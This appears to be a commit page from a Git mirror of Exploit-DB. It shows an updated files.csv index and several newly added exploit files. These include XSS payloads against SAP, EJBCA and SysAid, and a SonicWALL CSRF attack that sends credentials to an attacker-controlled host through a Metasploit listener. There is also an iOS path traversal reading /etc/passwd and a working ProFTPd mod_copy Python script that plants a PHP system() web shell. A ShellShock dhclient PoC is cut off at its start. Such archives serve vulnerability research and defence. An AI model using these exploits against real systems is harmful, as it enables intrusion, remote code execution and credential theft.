bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-05-08

Browse source 
19 new exploits
This commit is contained in:
Offensive Security 2015-05-08 05:02:43 +00:00
parent b2d25f8fa5
commit 01ba689949
27 changed files with 1185 additions and 21 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

32
files.csv
View file

@ -12648,7 +12648,7 @@ id,file,description,date,author,platform,type,port
14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - MKD Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-17,"Karn Ganeshen",windows,remote,0
14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - LIST Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-17,"Karn Ganeshen",windows,remote,0
14401,platforms/asp/webapps/14401.txt,"ClickAndRank Script - Authentication Bypass",2010-07-18,walid,asp,webapps,0
14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - CWD Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-18,fdisk,windows,remote,0
14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - CWD Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-18,fdiskyou,windows,remote,0
14403,platforms/windows/local/14403.txt,"Microsoft Windows Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0
14406,platforms/bsd/local/14406.pl,"GhostScript PostScript File Stack Overflow Exploit",2010-07-18,"Rodrigo Rubira Branco",bsd,local,0
14407,platforms/aix/remote/14407.c,"rpc.pcnfsd Remote Format String Exploit",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0
@ -12718,7 +12718,7 @@ id,file,description,date,author,platform,type,port
14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion Vulnerability",2010-07-27,"John Leitch",php,webapps,0
14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 - Local Privilege Escalation Vulnerability",2010-07-28,th_decoder,windows,local,0
14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - HTTP Remote Buffer Overflow (Post Auth)",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0
14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdisk,windows,local,0
14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local,0
14488,platforms/php/webapps/14488.txt,"joomla component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0
14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 utf8 - Directory Traversal Vulnerability",2010-07-28,mywisdom,unix,remote,0
14490,platforms/php/webapps/14490.txt,"nuBuilder Remote File inclusion Vulnerability",2010-07-28,Ahlspiess,php,webapps,0
@ -12813,7 +12813,7 @@ id,file,description,date,author,platform,type,port
14617,platforms/jsp/webapps/14617.txt,"Apache JackRabbit 2.0.0 webapp XPath Injection",2010-08-11,"ADEO Security",jsp,webapps,0
14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service Vulnerability",2010-08-11,"Oh Yaw Theng",windows,dos,0
14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service Vulnerability",2010-08-11,"Oh Yaw Theng",windows,dos,0
14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition Permanent XSS Vulnerability",2010-08-11,fdisk,php,webapps,0
14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition Permanent XSS Vulnerability",2010-08-11,fdiskyou,php,webapps,0
14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - Multiple Commands Remote Buffer Overflow Exploit (Post Auth)",2010-08-11,"Glafkos Charalambous ",windows,remote,21
14624,platforms/windows/dos/14624.py,"JaMP Player 4.2.2.0 - Denial of Service Vulnerability",2010-08-12,"Oh Yaw Theng",windows,dos,0
14625,platforms/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service Vulnerability",2010-08-12,"Oh Yaw Theng",windows,dos,0
@ -12833,7 +12833,7 @@ id,file,description,date,author,platform,type,port
14643,platforms/php/webapps/14643.txt,"sFileManager <= 24a - Local File Inclusion Vulnerability",2010-08-14,Pepelux,php,webapps,0
14644,platforms/php/webapps/14644.html,"Saurus CMS Admin Panel - Multiple CSRF Vulnerabilities",2010-08-14,"Fady Mohammed Osman",php,webapps,0
14645,platforms/php/webapps/14645.txt,"Sports Accelerator Suite 2.0 - (news_id) Remote SQL Injection Vulnerability",2010-08-14,LiquidWorm,php,webapps,0
14646,platforms/windows/dos/14646.py,"CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities PoC",2010-08-14,fdisk,windows,dos,0
14646,platforms/windows/dos/14646.py,"CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities PoC",2010-08-14,fdiskyou,windows,dos,0
14647,platforms/php/webapps/14647.php,"PHP-Fusion Local File Inclusion Vulnerability",2010-08-15,MoDaMeR,php,webapps,0
14648,platforms/php/webapps/14648.txt,"GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0
14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 SEH Buffer Overflow",2010-08-15,dijital1,windows,local,0
@ -13819,7 +13819,7 @@ id,file,description,date,author,platform,type,port
15938,platforms/php/webapps/15938.txt,"axdcms-0.1.1 - Local File Include Vulnerbility",2011-01-08,n0n0x,php,webapps,0
15939,platforms/php/webapps/15939.txt,"Elxis CMS 2009.2 - Remote file include vulnerbility",2011-01-08,n0n0x,php,webapps,0
15940,platforms/windows/dos/15940.pl,"HP Data Protector Manager 6.11 - Remote DoS in RDS Service",2011-01-08,Pepelux,windows,dos,0
15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit (SEH)",2011-01-08,fdisk,windows,local,0
15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit (SEH)",2011-01-08,fdiskyou,windows,local,0
15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0
15943,platforms/php/webapps/15943.txt,"mingle forum (wordpress plugin) <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0
15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 - CAP_SYS_ADMIN x86 & x64 - Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
@ -15070,9 +15070,9 @@ id,file,description,date,author,platform,type,port
17330,platforms/php/webapps/17330.html,"cPanel < 11.25 - CSRF - Add User php Script",2011-05-27,ninjashell,php,webapps,0
17335,platforms/php/webapps/17335.txt,"Duhok Forum 1.1 - SQL Injection Vulnerability",2011-05-28,M.Jock3R,php,webapps,0
17336,platforms/php/webapps/17336.txt,"Guru Penny Auction Pro 3.0 - Blind SQL Injection Vulnerability",2011-05-28,v3n0m,php,webapps,0
17345,platforms/windows/remote/17345.py,"HP Data Protector Client EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)",2011-05-29,fdisk,windows,remote,0
17345,platforms/windows/remote/17345.py,"HP Data Protector Client EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)",2011-05-29,fdiskyou,windows,remote,0
17338,platforms/php/webapps/17338.txt,"Joomla Component com_jmsfileseller Local File Inclusion Vulnerability",2011-05-28,Valentin,php,webapps,0
17339,platforms/windows/remote/17339.py,"HP Data Protector Client EXEC_CMD Remote Code Execution PoC (ZDI-11-055)",2011-05-28,fdisk,windows,remote,0
17339,platforms/windows/remote/17339.py,"HP Data Protector Client EXEC_CMD Remote Code Execution PoC (ZDI-11-055)",2011-05-28,fdiskyou,windows,remote,0
17341,platforms/php/webapps/17341.txt,"Joomla Component com_joomnik SQL Injection Vulnerability",2011-05-29,SOLVER,php,webapps,0
17343,platforms/php/webapps/17343.txt,"Puzzle Apps CMS 3.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",php,webapps,0
17344,platforms/php/webapps/17344.txt,"Invisionix Roaming System Remote metasys 0.2 - LFI Vulnerability",2011-05-29,"Treasure Priyamal",php,webapps,0
@ -33311,3 +33311,21 @@ id,file,description,date,author,platform,type,port
36906,platforms/linux/dos/36906.txt,"Apache Xerces-C XML Parser < 3.1.2 - DoS POC",2015-05-04,beford,linux,dos,0
36907,platforms/php/webapps/36907.txt,"Wordpress Ultimate Product Catalogue 3.1.2 - Multiple Persistent XSS & CSRF & File Upload",2015-05-04,"Felipe Molina",php,webapps,0
36908,platforms/lin_x86/shellcode/36908.c,"linux/x86 - exit(0) (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0
36926,platforms/php/webapps/36926.txt,"LeKommerce 'id' Parameter SQL Injection Vulnerability",2012-03-08,Mazt0r,php,webapps,0
36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0
36928,platforms/windows/local/36928.py,"Macro Toolworks 7.5 Local Buffer Overflow Vulnerability",2012-03-08,"Julien Ahrens",windows,local,0
36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
36930,platforms/multiple/webapps/36930.txt,"Wordpress Freshmail Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900
36933,platforms/linux/remote/36933.py,"ShellShock dhclient Bash Environment Variable Command Injection PoC",2014-09-29,fdiskyou,linux,remote,0
36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System listing.aspx searchText Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System /help/helpredir.aspx guide Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System /webi/webi_modify.aspx id Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
36937,platforms/php/webapps/36937.html,"phpMyVisites 2.4 phpmv2/index.php Multiple Cross Site Scripting Vulnerabilities",2012-03-09,AkaStep,php,webapps,0
36938,platforms/php/webapps/36938.txt,"singapore 0.10.1 'gallery' Parameter Cross Site Scripting Vulnerability",2012-03-11,T0xic,php,webapps,0
36939,platforms/java/webapps/36939.txt,"EJBCA 4.0.7 'issuer' Parameter Cross Site Scripting Vulnerability",2012-03-11,MustLive,java,webapps,0
36940,platforms/cgi/webapps/36940.txt,"Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery",2015-05-07,"Veit Hailperin",cgi,webapps,443
36941,platforms/xml/webapps/36941.txt,"IBM WebSphere Portal Stored Cross-Site Scripting Vulnerability",2015-05-07,"Filippo Roncari",xml,webapps,0
36942,platforms/php/webapps/36942.txt,"WordPress Freshmail Plugin <= 1.5.8 - (shortcode.php) SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80
36943,platforms/ios/webapps/36943.txt,"Album Streamer 2.0 iOS - Directory Traversal Vulnerability",2015-05-07,Vulnerability-Lab,ios,webapps,0

Can't render this file because it is too large.

10
platforms/asp/webapps/36934.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/52361/info
SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
SAP Business Objects XI R2 is vulnerable; other versions may be affected.
http://www.example.com/businessobjects/enterprise115/InfoView/listing.aspx
searchText=</script><script>alert(1);</script>

9
platforms/asp/webapps/36935.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52361/info
SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
SAP Business Objects XI R2 is vulnerable; other versions may be affected.
https://www.example.com/businessobjects/enterprise115/infoview/help/helpredir.aspx?guide=&#039;+alert(&#039;XSS 1&#039;)+&#039;&lang=en&rpcontext=&#039;+alert(&#039;XSS 2&#039;)+&#039;#

9
platforms/asp/webapps/36936.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52361/info
SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
SAP Business Objects XI R2 is vulnerable; other versions may be affected.
https://www.example.com/businessobjects/enterprise115/infoview/webi/webi_modify.aspx?id=&#039;+alert(&#039;XSS&#039;)+&#039;#

64
platforms/cgi/webapps/36940.txt Executable file
View file

@ -0,0 +1,64 @@
# Exploit Title: Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery
# Date: 04/28/2015
# Exploit Author: Veit Hailperin
# Vendor Homepage: www.dell.com
# Version: Dell SonicWALL SRA 7.5 prior to 7.5.1.0-38sv and 8.0 prior to 8.0.0.1-16sv
# CVE : 2015-2248
Exploitation Procedure (Outline):
1. Use CSRF to force currently logged in user to create a bookmark pointing to an endpoint controlled by the attacker.
2. Use subsequent request to call the bookmark just created. The identifier of the bookmark can be bruteforced using a single decrementing integer and causes minimal time delay.
3. Gather the credentials on the target server provided in step #1
1. Create a bookmark:
<html>
<body>
<form action="https://vulnerable.vpn-installation.tld/cgi-bin/editBookmark" method="POST">
<input type="hidden" name="bmName" value="foo" />
<input type="hidden" name="host" value="www.malicious-host.tld" />
<input type="hidden" name="description" value="bar" />
<input type="hidden" name="tabs" value="Baz" />
<input type="hidden" name="service" value="HTTP" />
<input type="hidden" name="fbaSSOEnabled" value="on" />
<input type="hidden" name="fbaSSOFormUserName" value="user" />
<input type="hidden" name="fbaSSOFormUserPassword" value="password" />
<input type="hidden" name="MC&#95;App" value="inherit" />
<input type="hidden" name="MC&#95;Copy" value="inherit" />
<input type="hidden" name="MC&#95;Print" value="inherit" />
<input type="hidden" name="MC&#95;Offline" value="inherit" />
<input type="hidden" name="name" value="name" />
<input type="hidden" name="type" value="type" />
<input type="hidden" name="owner" value="owner" />
<input type="hidden" name="cmd" value="add" />
<input type="hidden" name="wantBmData" value="true" />
<input type="hidden" name="ok" value="OK" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. Call the newly created bookmark
This might require some guesswork, because we don't know which value bookmarkAccessed needs to have.
<html>
<body>
<form action="https://vulnerable.vpn-installation.tld/cgi-bin/http">
<input type="hidden" name="HOST" value="www.malicious-host.tld" />
<input type="hidden" name="bookmarkAccessed" value="4" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
3. Set up a listener
E.g. metasploit payload
use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) >
[*] Listening on 0.0.0.0:80...
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://www.malicious-host.tld:80/
[*] Server started.
[*] vulnerable.vpn-installation.tld http_basic - Sending 401 to client vulnerable.vpn-installation.tld
[+] vulnerable.vpn-installation.tld http_basic - vulnerable.vpn-installation.tld - Credential collected: "user:password"

27
platforms/hardware/remote/36931.txt Executable file
View file

@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/52358/info
Barracuda CudaTel Communication Server is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.
Barracuda CudaTel Communication Server 2.0.029.1 is vulnerable; other versions may also be affected.
<td class="detailTD">
<div style="float: left;" class="printedName">
"><iframe div="" <="" onload='alert("VL")' src="a">
</td><script type="text/javascript">extensions_register('extOp530748', 'extOp530748-ext144',
{"flag_super":"0","flag_locked":
"0","bbx_extension_rcd":"2012-02-16
11:21:48.105901","bbx_extension_block_begin":"2088","map"{"bbx_conference_id":null,"bbx_provider_gateway_id":null,"sort_name":
"\"><iframe src=a onload=alert(\"vl\")
<","bbx_valet_parking_id":null,"bbx_extension_entity_map_id":"82","bbx_extension_entity_
map_fallback_exten":null,"bbx_
extension_entity_map_metadata":null,"bbx_user_id":null,"bbx_router_id":"20","bbx_group_id":null,"bbx_callflow_id":null,"_force_
row_refresh":"0","show_name":"\"><[EXECUTION OF PERSISTENT SCRIPT CODE]
<","bbx_queue_id":null,"bbx_tdm_card_port_id":null,"flag_standalone":"1","bbx_auto_attendant_id":null,"bbx_extension_id_
forward":null},"bbx_extension_name":null,"bbx_domain_id":"6","bbx_extension_block_end":"2088","type_id":
{"id":"20","type":"router","col":"bbx_router_id"},"map_id":"82","flag_external":"0","flag_voicemail":"0","bbx_extension_value"
:"2088","ldap":0,"bbx_extension_rpd":"2012-02-16 11:21:49.06783","user_synced":null,"printed_name":"\"><[EXECUTION OF
PERSISTENT SCRIPT CODE]
<","bbx_extension_id":"144","group_synced":null,"type":"router","flag_auto_provision":"0"});</script>

204
platforms/ios/webapps/36943.txt Executable file
View file

@ -0,0 +1,204 @@
Document Title:
===============
Album Streamer v2.0 iOS - Directory Traversal Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1481
Release Date:
=============
2015-05-07
Vulnerability Laboratory ID (VL-ID):
====================================
1481
Common Vulnerability Scoring System:
====================================
6.6
Product & Service Introduction:
===============================
1 Tap - Quick, Album Streamer, best Photo/Video Transfer app ever! Quick way to share your Album Photos and
Videos to your computer. It takes only single tap to stream and download all/selected photos or videos.
You can even view or play slide show of all your photos directly on the computer without downloading.
(Copy of the Homepage: https://itunes.apple.com/DE/app/id835284235 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a directory traversal web vulnerability in the official Album Streamer v2.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-05-07: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Spider Talk
Product: Album Streamer - iOS Mobile Web Application (Wifi) 2.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A Path Traveral web vulnerability has been discovered in the official Album Streamer v2.0 iOS mobile web-application.
The security vulnerability allows a remote attacker to unauthorized request system path variables to compromise the
mobile application or apple iOS device.
The vulnerability is located in the `id` request to the `path` value of the photoDownload module. The vulnerability can be exploited by
local or remote attackers without user interaction. The attacker needs to replace the picture assets id path request of the photoDownload
module with a malicious payload like ./etc/passwd ./etc/hosts. The attack vector is located on the application-side of the service and
the request method to execute is GET (client-side).
The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6.
Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction.
Successful exploitation of the vulnerability results in mobile application compromise
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] photoDownload
Vulnerable Parameter(s):
[+] id
Affected Module(s):
[+] photoDownload Item Index
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: http://localhost/photoDownload?id=[DIRECTORY TRAVERSAL]../../../../../../../etc
Vulnerable Source(s): localhost/photoDownload
<div class="thumbnailBorder"><div class="thumbnailPicture"><img class="showPreviewModalPopup" src="/photoTbDownload?id=id0" border="0" height="100px" width="100px"></div><div id="thumbnailTitle"><input id="id0" name="photoCheckbox" type="checkbox"> <a href="/photoDownload?id=id0">asset.JPG</a></div></div><div class="thumbnailBorder"><div class="thumbnailPicture"><img class="showPreviewModalPopup" src="/photoTbDownload?id=id1" border="0" height="100px" width="100px"></div><div id="thumbnailTitle"><input id="id1" name="photoCheckbox" type="checkbox"> <a href="/photoDownload?id=id1">asset.PNG</a></div></div>
<!-- PREVIEW SECTION -->
<div style="display: none;" id="overlay"></div>
<div style="display: none;" id="popupBox">
<div style="display: none;" id="popupContent">
<img class="previewLoadingImage" id="previewLoading" src="/loading.gif">
<img class="previewImage" src="/photoDownload?id=id1">
<img src="/imgAlbumStreamPrev.png" class="btnShowPrev" height="25px" width="25px">
<img src="/imgAlbumStreamNext.png" class="btnShowNext" height="25px" width="25px">
</div>
</div>
<!-- BREAK -->
<div class="sectionBreak"> </div>
<!-- VIDEOS SECTION -->
<div>
<h1>
<input class="videoAllCheckBox" id="videoAllCheckBox" type="checkbox"> Videos
<input class="btnVideoDownload" value="Download (Selected)" type="button">
</h1>
</div>
--- Poc Session Logs [GET] ---
Status: 200[OK]
GET http://localhost/photoDownload?id=../../../../etc Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[25568] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[25568]
Content-Disposition[: attachment; filename=asset.JPG]
Date[Thu, 30 Apr 2015 13:29:14 GMT]
Reference(s):
http://localhost/
http://localhost/photoDownload
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the id value in the photoDownload module.
Restrict the input and disallow special chars to prevent further path traversal attacks.
implement a whitelist to request only authroized urls through the mobile app api.
Security Risk:
==============
The security risk of the directory traversal vulnerability in the wifi interface is estimated as high. (CVSS 6.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

9
platforms/java/webapps/36939.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52400/info
EJBCA is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
EJBCA 4.0.7 is vulnerable; other versions may also be affected.
http://www.example.com/ejbca/publicweb/webdist/certdist?cmd=revoked&issuer=%3Cscript%3Ealert(document.cookie)%3C/script%3E&serno=1

70
platforms/jsp/webapps/36929.txt Executable file
View file

@ -0,0 +1,70 @@
source: http://www.securityfocus.com/bid/52356/info
Ilient SysAid is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker could leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Ilient SysAid 8.5.05 is vulnerable; other versions may also be affected.
HTML injection:
<tablewidth="100%"cellspacing="5"cellpadding="5"border="0"class="Maxed">
<tbody><trvalign="top"><tdwidth="50%"style="padding:10px;"id="Container_1"><tableclass="MaxedContainerContainer_1">
<tbody><tr>
<tdclass="Container_Header">
<table>
<tbody><tr>
<tdclass="Container_Header_First">
<tdclass="Container_Header_Center">
Administratorsonline
</td><tdclass="Container_Header_Last">
</td>
</tr>
</tbody></table></td>
</tr>
<tr>
<tdclass="Container_Body">
<divclass="BorderFix_FFForm_Ctrl_Label">
<br/>
1Users<br/>
JulienAhrens<EXCUTES PERSISTENT SCRIPt CODE HERE!></div></td></tr></tbody></table></td></tr></tbody>
</table></div></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></body></html>
Cross-site scripting:
http://www.example.com:8080/sysaid/CustomizeListView.jsp?listName=Assets&listViewName=<script>alert(document.cookie)</script>
or base64 encoded:
http://www.example.com:8080/sysaid/CustomizeListView.jsp?listName=Service%20Requests&srType=1&listViewName= ()
BASE64@PHNjcmlwdD5hb
GVydChlc2NhcGUoZG9jdW1lbnQuY29va2llKSk8L3NjcmlwdD4=
Non-persistent(listViewName):
<tdcolspan="6"class="Frame_Body_Center">
<tablewidth="100%"border="0"class="Maxed">
<tbody><trvalign="top">
<tdstyle="padding:10px;"id="Conainer_1">
<tablewidth=""cellspacing="0"cellpadding="0"border="0">
<tbody><tr>
<td>
<tablewidth="100%"cellspacing="0"cellpadding="0"border="0"class="MaxedContainerContainer_1">
<tbody><tr>
<tdclass="Container_Header">
<table>
<tbody><tr>
<tdclass="Container_Header_First"/>
<tdclass="Container_Header_Center">
<palign="center"style="font-size:16px;">Customizelist-Assets-<EXCUTES PERSISTENT SCRIPt CODE HERE>
</p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr>
</tbody></table></td></tr></tbody></table></form></body></html>

47
platforms/linux/remote/36803.py Executable file
View file

@ -0,0 +1,47 @@
# Title: ProFTPd 1.3.5 Remote Command Execution
# Date : 20/04/2015
# Author: R-73eN
# Software: ProFTPd 1.3.5 with mod_copy
# Tested : Kali Linux 1.06
# CVE : 2015-3306
# Greetz to Vadim Melihow for all the hard work .
import socket
import sys
import requests
#Banner
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if(len(sys.argv) < 4):
print '\n Usage : exploit.py server directory cmd'
else:
server = sys.argv[1] #Vulnerable Server
directory = sys.argv[2] # Path accessible from web .....
cmd = sys.argv[3] #PHP payload to be executed
evil = '<?php system("' + cmd + '") ?>'
s.connect((server, 21))
s.recv(1024)
print '[ + ] Connected to server [ + ] \n'
s.send('site cpfr /etc/passwd')
s.recv(1024)
s.send('site cpto ' + evil)
s.recv(1024)
s.send('site cpfr /proc/self/fd/3')
s.recv(1024)
s.send('site cpto ' + directory + 'infogen.php')
s.recv(1024)
s.close()
print '[ + ] Payload sended [ + ]\n'
print '[ + ] Executing Payload [ + ]\n'
r = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP
if (r.status_code == 200):
print '[ * ] Payload Executed Succesfully [ * ]'
else:
print ' [ - ] Error : ' + str(r.status_code) + ' [ - ]'
print '\n http://infogen.al/'

97
platforms/linux/remote/36933.py Executable file
View file

@ -0,0 +1,97 @@
#!/usr/bin/python
# Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC
# Date: 2014-09-29
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 4.1
# Tested on: Debian, Ubuntu, Kali
# CVE: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
from scapy.all import *
conf.checkIPaddr = False
fam,hw = get_if_raw_hwaddr(conf.iface)
victim_assign_ip = "10.0.1.100"
server_ip = "10.0.1.2"
gateway_ip = "10.0.1.2"
